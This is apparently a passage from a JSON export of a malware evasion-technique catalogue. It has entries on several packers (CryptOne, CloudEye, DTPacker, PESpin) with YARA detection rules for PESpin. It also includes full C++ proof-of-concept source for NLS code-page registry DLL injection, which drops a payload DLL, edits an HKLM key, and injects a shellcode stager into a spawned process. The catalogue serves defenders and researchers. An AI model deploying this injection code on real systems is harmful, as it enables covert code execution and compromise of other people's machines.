            "unprotect_id": "U1427",
            "name": "CryptOne",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "CryptOne is a packer that became popular among several major threat actors. Fox-IT first reported that the group behind WastedLocker had begun using it; it has also been used to pack NetWalker, Gozi ISFB v3, ZLoader, Emotet, Dridex, and SmokeLoader.",
            "resources": "https://www.deepinstinct.com/blog/a-deep-dive-into-packing-software-cryptone\r\nhttps://github.com/Tera0017/de-CryptOne",
            "tags": "cryptone",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 209,
            "unprotect_id": "U1426",
            "name": "CloudEye/DarkEye",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "CloudEyE, an evolved version of DarkEyE, lets threat actors wrap malware of their choice so that it is not detected by anti-virus solutions. The program is sold by a legitimate Italian company, which markets it as a tool for developers who want to protect their software from piracy and reverse engineering. The published tutorials and forum posts about CloudEyE show that, in practice, the program's purpose is to aid malicious activity.",
            "resources": "https://www.securitycode.eu/\r\nhttps://atlas-cybersecurity.com/cyber-threats/cloudeye-darkeye-evolved/",
            "tags": "cloudeye,darkeye",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 208,
            "unprotect_id": "U1237",
            "name": "NlsCodeInjectionThroughRegistry",
            "categories": [
                {
                    "id": 4,
                    "key": "process-manipulating",
                    "label": "Process Manipulating"
                }
            ],
            "description": "DLL injection through registry modification of the NLS code page ID.\r\n\r\nThere are two ways to accomplish this technique:\r\n\r\n- Point a code page ID under the `Nls\\CodePage` registry key at the payload DLL and call `SetThreadLocale`. The DLL must export a function named `NlsDllCodePageTranslation`, which is where the main payload runs.\r\n\r\n- The second method triggers the same load through `SetConsoleCP` or `SetConsoleOutputCP`. If the process is not console based, a console can be allocated with `AllocConsole`.\r\n\r\nThe POC injects position-independent shellcode into a remote process, which works as a stager for the actual loading of the DLL.",
            "resources": "https://github.com/NtQuerySystemInformation/NlsCodeInjectionThroughRegistry",
            "tags": "",
            "snippets": [
                {
                    "id": 94,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/208/",
                    "description": "Original source code: https://github.com/NtQuerySystemInformation/NlsCodeInjectionThroughRegistry",
                    "plain_code": "/* NLSRegistryCodeInjection.cpp */\r\n\r\n#include \"payload.hpp\"\r\n#include \"headers.hpp\"\r\n\r\n//Pending: Make initializer_list cleaner\r\nuint32_t main(void)\r\n{\r\n    std::initializer_list<std::wstring> list = { L\"SYSTEM\\\\ControlSet001\\\\Control\\\\Nls\\\\CodePage\", L\"Payload.dll\" , L\"\"};\r\n    auto regObj = std::make_unique<RegistryManipulation>(list);\r\n    if (OpenKeyForNlsModification(regObj.get()))\r\n    {\r\n#ifdef DEBUG\r\n        std::printf(\"Key has been modified, now preparing for injection\\n\");\r\n#endif \r\n        std::printf(\"Payload executed sucessfully :)\\n\");\r\n        system(\"pause\");\r\n    }\r\n\r\n    return EXIT_SUCCESS;\r\n}\r\n//###########################################################\r\n/* payload.cpp */\r\n\r\n#include \"headers.hpp\"\r\n#include \"payload.hpp\"\r\n#include \"strsafe.h\"\r\n#include \"payload.hpp\"\r\n#include \"resource1.h\"\r\n#define MAX_SIZE_DATA 260\r\n\r\n//IMPLEMENTED IT two different functions for convertion. \r\nUINT StringToIntDecimal(PWCHAR str) noexcept\r\n{\r\n\tuint32_t num = _wtoi(str);\r\n\treturn num;\r\n}\r\nUINT StringToInt(PWCHAR str) noexcept {\r\n\r\n\twchar_t chrSubkey, chr, * j;\r\n\tUINT i;\r\n\tj = str;\r\n\tchrSubkey = *str;\r\n\tfor (i = 0; *j; chrSubkey = *j)\r\n\t{\r\n\t\t++j;\r\n\t\tif ((chrSubkey - 0x41) > 5u)\r\n\t\t{\r\n\t\t\tif ((chrSubkey - 0x30) > 9u)\r\n\t\t\t{\r\n\t\t\t\tif ((chrSubkey - 0x61) > 5u)\r\n\t\t\t\t\treturn i;\r\n\t\t\t\tchr = chrSubkey - 87;\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tchr = chrSubkey - 0x30;\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tchr = chrSubkey - 55;\r\n\t\t}\r\n\t\ti = chr + 16 * i;\r\n\t}\r\n\treturn i;\r\n}\r\nBOOLEAN CompareLastElementString(PWCHAR str1, PWCHAR str2, BOOLEAN CaseInsensitive)\r\n{\r\n\tbool bResult = false;\r\n\t//Has to find .dll somewhere, in the substring, otherwise doesnt exist.\r\n\twchar_t* dll = wcsstr(str1, str2);\r\n\tif (dll != nullptr) {\r\n\t\tbResult = true;\r\n\t}\r\n\treturn bResult;\r\n}\r\nbool FindCodePageWithPayload(PRegistryKey regObject, UINT dwValuesCount, UINT dwMaxLenValues){\r\n\tDWORD dwCountName = 0, typeData, ValueDataSize = 0;\r\n\t//uint32_t CodePageInt;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\tbool bResult = false;\r\n\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260;  \r\n\t\tValueDataSize = 260;\r\n\t\tLSTATUS status = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif (status != ERROR_SUCCESS && GetLastError() != ERROR_ALREADY_EXISTS)\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID %s, Last error: [%x]\\n\", CodePageID, GetLastError());\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Iterating: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif \r\n\t\tif (typeData == REG_SZ && regObject->compareStringEqual(Index::DLL_NAME, ValueData)){\r\n#ifdef _DEBUG\r\n\t\t\tstd::wprintf(L\"Payload value has been found!: %d - %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\t\tuint32_t strHex = std::stoull(CodePageID, nullptr, 10);\r\n\t\t\tuint32_t strDecimal = std::stoull(CodePageID, nullptr, 16);\r\n\t\t\tregObject->setCodePageID(strHex, CodePageIDIndex::CodePageInt);\r\n\t\t\tregObject->setCodePageID(strDecimal, CodePageIDIndex::CodePageHex);\r\n\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", strDecimal, strHex);\r\n\t\t\tbResult = true;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\treturn bResult;\r\n}\r\n\r\nbool IterateCodePageAndExtractProperId(PRegistryKey regObject) {\r\n\tDWORD dwMaxLenValues, dwCountName = 0, dwValuesCount, typeData, ValueDataSize = 0;\r\n\tuint32_t CodePageInt = NULL, posCount = NULL;\r\n\tbool correctRet = false;\r\n\tLSTATUS status;\r\n\tWCHAR CodePageID[MAX_PATH], ValueData[MAX_SIZE_DATA];\r\n\r\n\t//Queries information for the NLS subkey, mostly related to the values, which is the part that interests us the most.\r\n\tif (::RegQueryInfoKeyW(regObject->hSubkeyNls, nullptr, nullptr, nullptr,\r\n\t\tnullptr, nullptr, nullptr, &dwValuesCount, &dwMaxLenValues, nullptr, nullptr, nullptr))\r\n\t{\r\n\t\tstd::cerr << \"Could not query information for the key, last error is: \" << GetLastError() << \"\\n\";\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Only one failing, lets fix it.\r\n\tif (FindCodePageWithPayload(regObject, dwValuesCount, dwMaxLenValues)){\r\n\t\tcorrectRet = true;\r\n\t\treturn correctRet;\r\n\t}\r\n\t//Find one with .dll, then from there increase one until it works out.\r\n\tfor (UINT i = 0; i < dwValuesCount; i++) {\r\n\t\tdwCountName = 260;\r\n\t\tValueDataSize = 260;\r\n\t\tstatus = RegEnumValueW(regObject->hSubkeyNls, i, CodePageID, &dwCountName, nullptr, &typeData, (BYTE*)&ValueData,\r\n\t\t\t&ValueDataSize);\r\n\t\tif ((status != EXIT_SUCCESS) && (GetLastError() != ERROR_ALREADY_EXISTS))\r\n\t\t{\r\n\t\t\tstd::wprintf(L\"Could not query Code Page ID 
%s, Last error: [%x]\\n\", CodePageID, status);\r\n\t\t\tcontinue;\r\n\t\t}\r\n#ifdef _DEBUG\r\n\t\tstd::wprintf(L\"Querying value i: %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n#endif\r\n\t\tif (typeData == REG_SZ && CompareLastElementString(ValueData, const_cast<wchar_t*>(L\".dll\"), FALSE))\r\n\t\t{\r\n#ifdef _DEBUG\r\n\t\t\tstd::wprintf(L\"Value with dll found in i = %d, %s = %s\\n\", i, CodePageID, ValueData);\r\n\t\t\t//Convert from str to hex\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tstd::wprintf(L\"Code page as int is: %x\\n\", CodePageInt);\r\n#endif // _DEBUG\r\n\t\t\tCodePageInt = StringToInt(CodePageID);\r\n\t\t\tposCount = i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (CodePageInt == NULL) {\r\n\t\tstd::printf(\"Could not find apropiate dll extension inside one of the subvalues\\n\");\r\n\t\treturn correctRet;\r\n\t}\r\n\t//FIX THIS CODE, WHEN PRINTING THERE IS SOMETHING THAT GOES WRONG.\r\n\tCodePageInt += 1;\r\n\tfor (UINT i = 0; i < dwValuesCount - posCount; i++) {\r\n\t\t//2.Then we proceed to check if the code page ID value exists, if it doesnt, we create it and set the data.\r\n\t\tif (SUCCEEDED(StringCchPrintfW(ValueData, MAX_SIZE_DATA, L\"%04x\", CodePageInt)))\r\n\t\t{\r\n\t\t\tstd::printf(\"Trying to create in CodePage ID %x\\n\", CodePageInt);\r\n\t\t}\r\n\t\tstatus = RegQueryValueEx(regObject->hSubkeyNls, ValueData, NULL, NULL, NULL, NULL);\r\n\t\tif (status != ERROR_SUCCESS && status == ERROR_FILE_NOT_FOUND)\r\n\t\t{\r\n\t\t\tif (!RegSetValueExW(regObject->hSubkeyNls, ValueData, NULL, REG_SZ, (BYTE*)regObject->getStringBuffer(Index::DLL_NAME),\r\n\t\t\t\tregObject->getStringSize(Index::DLL_NAME)))\r\n\t\t\t{\r\n\t\t\t\t//std::wprintf(L\"The string value of the data is: %s\\n\", ValueData);\r\n\t\t\t\tuint32_t CodePageDecimal = StringToIntDecimal(ValueData);\r\n\t\t\t\tstd::printf(\"Sucessfully created dll payload in CodePage ID %x\\n\", CodePageInt);\r\n\t\t\t\tregObject->setCodePageID(CodePageInt, 
CodePageIDIndex::CodePageHex);\r\n\t\t\t\tregObject->setCodePageID(CodePageDecimal, CodePageIDIndex::CodePageInt);\r\n\t\t\t\tstd::wprintf(L\"Values: CodepageHex = %d, CodePageInt = 0x%x\\n\", CodePageInt, CodePageDecimal);\r\n\t\t\t\tcorrectRet = true;\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t\tCodePageInt += 1;\r\n\t}\r\n\treturn correctRet;\r\n}\r\n\r\nbool CreateProcessToInject(LPPROCESS_INFORMATION procInfo) {\r\n\tSTARTUPINFOW infoProc;\r\n\t//PROCESS_INFORMATION processInfo;\r\n\tZeroMemory(&infoProc, sizeof(infoProc));\r\n\tinfoProc.cb = sizeof(infoProc);\r\n\tZeroMemory(procInfo, sizeof(procInfo));\r\n\twchar_t path[MAX_PATH];\r\n\tGetSystemDirectoryW(path, MAX_PATH);\r\n\twcscat_s(path, MAX_PATH, L\"\\\\cmd.exe\");\r\n\treturn CreateProcessW(NULL, path, NULL, NULL, false, CREATE_NEW_CONSOLE, NULL, NULL, &infoProc, procInfo) != NULL;\r\n}\r\n\r\nbool DropSystemDllPayload(PRegistryKey regObject) {\r\n\tHMODULE hMod = GetModuleHandleA(NULL);\r\n\tHRSRC hResource = FindResource(hMod, MAKEINTRESOURCE(IDR_RT_RCDATA1), L\"RT_RCDATA\");\r\n\tif (hResource == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the payload dll resource, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwSizeResource = SizeofResource(hMod, hResource);\r\n\tHGLOBAL hResLoaded = LoadResource(hMod, hResource);\r\n\tif (hResLoaded == NULL)\r\n\t{\r\n\t\tprintf(\"Could not find the dll, exiting...\\n\");\r\n\t\treturn false;\r\n\t}\r\n\tauto pBuffer = static_cast<BYTE*> (LockResource(hResLoaded));\r\n\tLPWSTR pathPayload = new wchar_t[MAX_PATH];\r\n\tGetSystemDirectoryW(pathPayload, MAX_PATH);\r\n\twcscat_s(pathPayload, MAX_PATH, L\"\\\\\");\r\n\twcscat_s(pathPayload, MAX_PATH, regObject->getStringBuffer(Index::DLL_NAME));\r\n\tregObject->setStringBuffer(pathPayload, Index::FULL_PAYLOAD_DLL_PATH);\r\n\tHANDLE hFile = CreateFileW(pathPayload, GENERIC_ALL, FILE_SHARE_DELETE,\r\n\t\tNULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, nullptr);\r\n\tdelete[] pathPayload;\r\n\tif (hFile == 
INVALID_HANDLE_VALUE)\r\n\t{\r\n\t\tif (GetLastError() == ERROR_FILE_EXISTS){\r\n\t\t\tstd::printf(\"File already exists, trying to set up registry.\\n\");\r\n\t\t\treturn true;\r\n\t\t}\r\n\t\tstd::printf(\"Could not obtain HANDLE to the newly created FILE, last error is %d\\n\", GetLastError());\r\n\t\treturn false;\r\n\t}\r\n\tDWORD dwNumberBytesWritten;\r\n\tif (!WriteFile(hFile, pBuffer, dwSizeResource, &dwNumberBytesWritten, nullptr))\r\n\t{\r\n\t\tstd::printf(\"Could not write to file, last error is %d\\n\", GetLastError());\r\n\t\tCloseHandle(hFile);\r\n\t\treturn false;\r\n\t}\r\n\tCloseHandle(hFile);\r\n\treturn true;\r\n}\r\n\r\nvoid SelfSpawnPayload(DWORD dwCodePageId)\r\n{\r\n\tif (!GetConsoleWindow())\r\n\t{\r\n\t\tif (!AllocConsole()) {\r\n\t\t\treturn;\r\n\t\t}\r\n\t}\r\n\tif (!SetConsoleOutputCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test injection in SetConsoleOutputCP, last error is: 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tif (!SetConsoleCP(dwCodePageId)) {\r\n\t\tstd::printf(\"Could not self test for SetConsoleCp: Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tSetThreadUILanguage(0);\r\n}\r\n\r\nvoid InjectStagerToPayload(PRegistryKey regObject) {\r\n\tLPVOID lpCodePageID = (LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, sizeof(DWORD), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (lpCodePageID == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\tDWORD codePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, lpCodePageID, &codePageID, sizeof(DWORD), NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Alloc and write shellcode, easiest way is VirtualAllocEx + WPM, but we have to pass arg, so I am not so sure how I am going to do that...\r\n\tLPVOID ShellcodeMemory = 
(LPVOID)VirtualAllocEx(regObject->m_procInfo.hProcess, NULL, lengthInject, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);\r\n\tif (ShellcodeMemory == nullptr) {\r\n\t\tstd::printf(\"Could not allocate buffer in remote process\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//This will write the payload in the remote process.\r\n\tif (!WriteProcessMemory(regObject->m_procInfo.hProcess, ShellcodeMemory, &StubInject, lengthInject, NULL)) {\r\n\t\tstd::printf(\"Could not create write memory with codePageID to inject\\n\");\r\n\t\treturn;\r\n\t}\r\n\t//Need to change protection to EXECUTE_READ.\r\n\tDWORD dwProtection;\r\n\tif (!VirtualProtectEx(regObject->m_procInfo.hProcess, ShellcodeMemory, lengthInject, PAGE_EXECUTE_READ, &dwProtection)) {\r\n\t\tstd::printf(\"Could not change protection of memory for shellcode injection. Last error is 0x%x\\n\", GetLastError());\r\n\t\treturn;\r\n\t}\r\n\tHANDLE hThread = CreateRemoteThread(regObject->m_procInfo.hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)ShellcodeMemory, lpCodePageID, 0, nullptr);\r\n\tif (hThread == INVALID_HANDLE_VALUE) {\r\n\t\tstd::printf(\"Could not open a handle to the payload .exe\\n\");\r\n\t\treturn;\r\n\t}\r\n\tstd::printf(\"Sucessfully injected to remote process, where shellcodeMemory is %p, and the codePageID is %d\\n\", ShellcodeMemory, codePageID);\r\n}\r\n\r\n//Error of payload is at writing the payload.dll!\r\nbool OpenKeyForNlsModification(PRegistryKey regObject) noexcept\r\n{\r\n\tbool bResult = false; \r\n\tif (RegOpenKeyExW(HKEY_LOCAL_MACHINE, regObject->getStringBuffer(Index::SUBKEY_KEY_VALUE),\r\n\t\t0, KEY_ALL_ACCESS, &regObject->hSubkeyNls) != EXIT_SUCCESS)\r\n\t{\r\n\t\tstd::printf(\"Could not open handle to subkey of codePage!, LastError [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\tif (!DropSystemDllPayload(regObject)) {\r\n\t\tstd::printf(\"Payload dll has been failed to drop main payload \\n\");\r\n\t\treturn bResult;\r\n\t}\r\n\tif 
(!IterateCodePageAndExtractProperId(regObject)){\r\n\t\tstd::printf(\"Could not iterate key for proper modification. Last error: [0x%x]\\n\", GetLastError());\r\n\t\treturn bResult;\r\n\t}\r\n\t//DWORD dwCodePageID = regObject->getCodePageID(CodePageIDIndex::CodePageInt);\r\n\t//std::printf(\"The code page ID is %d\\n\", dwCodePageID);\r\n\t//SelfSpawnPayload(dwCodePageID);\r\n\tif (CreateProcessToInject(&regObject->m_procInfo))\r\n\t{\r\n\t\tInjectStagerToPayload(regObject);\r\n\t}\r\n\r\n\treturn bResult;\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 207,
            "unprotect_id": "U1416",
            "name": "DTPacker",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "DTPacker is a .NET packer or downloader which although seeing considerable variety in the first stage, uses a second stage with a fixed password as part of the decoding. \r\n\r\nThe main difference between a packer and a downloader is the location of the payload data which is embedded in the former and downloaded in the latter. DTPacker uses both forms. It is unusual for a piece of malware to be both a packer and downloader.  \r\n\r\nThis packer uses multiple obfuscation techniques to evade antivirus, sandboxing, and analysis. It is likely distributed on underground forums",
            "resources": "https://www.proofpoint.com/au/blog/threat-insight/dtpacker-net-packer-curious-password-1",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 206,
            "unprotect_id": "U1425",
            "name": "PESpin",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "PESpin is a Windows executable files protector, compressor coded in Win32ASM using MASM. Overall, this application will enable the compression of the entire executable - code, data, and resources, thus leaving the file protected against patching or disassembling.",
            "resources": "http://downloads.fyxm.net/PESpin-95477.html",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 116,
                    "key": "yara_detect_pespin",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_detect_Pespin",
                    "rule": "rule PESpin_V07_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 01 ?? 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V13betaX_cyberbobnbsp_nbsp_SignByfly_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V1304_cyberbobnbsp_nbsp_SignByfly_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB ?? ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 ?? ?? ?? ?? EB 06 ?? ?? ?? ?? ?? ?? 
F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V041_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 02 D2 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 ?? ?? ?? ?? ?? 53 8F ?? ?? ?? ?? ?? BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 ?? 68 3C 01 00 00 59 8D ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 ?? ?? ?? ?? 59 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 ?? E8 1A 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 CD 4E 40 00 8B 42 3C 03 C2 89 85 D7 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D EB 4E 40 00 53 8F 85 E1 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 
8B 3B 89 BD 90 4F 40 00 8D 5B 04 8B 1B 89 9D 95 4F 40 00 E8 00 00 00 00 58 01 68 05 68 D3 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD C6 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C EB 04 01 EB 0? }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v01_Cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 
2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_03_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V10_cyberbob_20080312: 